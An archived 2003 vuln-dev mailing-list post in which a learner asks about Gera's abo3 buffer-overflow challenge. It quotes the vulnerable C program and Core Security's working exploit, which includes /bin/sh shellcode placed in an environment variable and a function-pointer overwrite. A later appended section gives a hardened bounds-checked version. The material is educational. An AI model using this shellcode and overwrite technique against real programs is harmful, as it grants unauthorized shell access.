Abo3 (can someone help me?)

From: Discussion Lists (discussions_at_lagraphico.com)
Date: 05/25/03

  • Next message: Diode Trnasistor: "Re: N00b questions :\"
    Date: Sat, 24 May 2003 21:11:20 -0700
    To: <vuln-dev@securityfocus.com>
    

    Hi all,
    This list has become far more interesting with the challenges. Thanks
    to all for the participation. Recently, a user posted a particular
    site:

    http://community.core-sdi.com/~gera/InsecureProgramming/abo3.html

    Which has the following code:

    /* abo3.c *
     * specially crafted to feed your brain by gera@core-sdi.com */

    /* This'll prepare you for The Next Step */

    int main(int argv,char **argc) {
            extern system,puts;
            void (*fn)(char*)=(void(*)(char*))&system;
            char buf[256];

            fn=(void(*)(char*))&puts;
            strcpy(buf,argc[1]);
            fn(argc[2]);
            exit(1);
    }

    The issue here is that there is an exit(1) at the end of the code. So
    even if you were to overwrite the return address, it would not matter
    because there is no return (if I understand correctly).

    The solution, according to this place:

    http://www.core-sec.com/examples/core_vulnerabilities.pdf

    is that we have to stick our shellcode in an environment variable, then
    overwrite the address of that variable into the address of the fn()
    function. So they lay out the following code to do it (questions
    in-line):

    /*
    ** exp3.c
    ** Coded by CoreSecurity - info@core-sec.com
    **/

    #include <string.h>
    #include <unistd.h>

    #define BUFSIZE 261

    /* Why 261? The vulnerable program allocates 256 I thought. Where is
    that other 5 going to/for? */

    /* 24 bytes shellcode */
    char shellcode[]=
            /* 1 P h \ \ s h h \ b i */
            "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
            /* n P 2 */
            "\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    /* so it is pushing /bin/sh backwards on the stack. Aleph1 talks about
    how to create this code so I won't ask about it*/
    int main(void) {
            char *env[3] = {shellcode, NULL};
            char evil_buffer[BUFSIZE];
            char *p;

            /*Calculating address of shellcode */
            int ret = 0xbffffffa - strlen(shellcode) - strlen("/home/user/gera/abo3");
    /* That is what I don't get. First, what is the 0xbffffffa address? Is
       that supposedly where the ending address of the code is when everything
       is pushed onto the stack? I believe strlen calculates the length of a
       string? If that is the case, why do they need to calculate the
       shellcode and the path? I also assume the path is case specific. In
       other words, if the binary has a different path on my system, I would
       use that instead. */

            /* constructing the buffer */
            p = evil_buffer;
            memset(p, 'B', 256); // Some junk
            p += 256;

            *((void **)p) = (void *) (ret);
            p += 4;
            *p = '\0';

            /* Two arguments are passed to the vulnerable program */
            execle("/home/user/gera/abo3", "abo3", evil_buffer, "A", NULL, env);
    }
    __________________________________________
    I don't completely understand much of that last part either, but I have
    the K&R book, so I will drag it out and see what I can find out.
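
As an added example (not part of the original post, and not gera's or Core Security's code): the defensive counterpart of abo3.c in C. The challenge program copies argv[1] into a 256-byte buffer with strcpy and then calls a function pointer that sits next to that buffer; the exploit above fills exactly 256 bytes of junk, a 4-byte pointer and a NUL, which is where its 261 comes from. The version below keeps the same layout (buffer followed by function pointer, placed in a struct so it can be inspected) but replaces the unbounded copy with a length check, so an oversized argument is rejected and the pointer is never reached. Names (safe_copy, abo3_hardened, struct frame) and the helper inputs are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 256

/* Same shape abo3 relies on: a fixed buffer immediately followed by a
 * function pointer. Kept in one struct so the self-checks can look at both. */
struct frame {
    char buf[BUF_LEN];
    int (*fn)(const char *);
};

/* Bounded copy: refuses any source that does not fit together with its NUL.
 * This is the one change that removes the overflow. */
int safe_copy(char *dst, size_t dst_len, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_len)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened equivalent of abo3's main(): copies arg1 into the buffer only if
 * it fits, then calls fn on arg2 (fn is puts, as in the challenge).
 * Returns 1 if arg1 was rejected, 0 if it was accepted; *intact reports
 * whether fn still points at puts after the copy step. */
int abo3_hardened(const char *arg1, const char *arg2, int *intact) {
    struct frame f;
    f.fn = puts;
    if (safe_copy(f.buf, sizeof f.buf, arg1) != 0) {
        *intact = (f.fn == puts);
        return 1;
    }
    *intact = (f.fn == puts);
    f.fn(arg2);
    return 0;
}

/* Self-check: 300 'B's (constructed here) must be rejected, pointer untouched. */
int oversized_input_is_rejected(void) {
    char big[301];
    int intact = 0;
    memset(big, 'B', 300);
    big[300] = '\0';
    return abo3_hardened(big, "A", &intact) == 1 && intact == 1;
}

/* Self-check: a short argument is accepted and the pointer is untouched. */
int fitting_input_is_accepted(void) {
    int intact = 0;
    return abo3_hardened("hello", "A", &intact) == 0 && intact == 1;
}

/* Self-check: 255 characters (plus NUL) fit exactly; 256 do not. */
int boundary_is_exact(void) {
    char s[BUF_LEN + 1];
    int intact = 0;
    memset(s, 'B', BUF_LEN);
    s[BUF_LEN - 1] = '\0';           /* 255 chars + NUL: fills the buffer */
    int fits = abo3_hardened(s, "A", &intact) == 0 && intact == 1;
    s[BUF_LEN - 1] = 'B';
    s[BUF_LEN] = '\0';               /* 256 chars: one too many */
    int rejected = abo3_hardened(s, "A", &intact) == 1 && intact == 1;
    return fits && rejected;
}

int main(int argc, char **argv) {
    int intact = 0;
    if (argc < 3) {
        fprintf(stderr, "usage: %s <arg1> <arg2>\n", argv[0]);
        return 2;
    }
    int rc = abo3_hardened(argv[1], argv[2], &intact);
    printf("rejected=%d fn_intact=%d\n", rc, intact);
    return rc;
}
```

Run it with any two arguments; an argv[1] of 256 or more characters prints rejected=1 and never reaches the call through fn. The check is `n >= dst_len` rather than `n > dst_len` because the terminating NUL also needs a slot; off-by-one errors at exactly that boundary are what the 261-byte buffer in the exploit is counting on.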

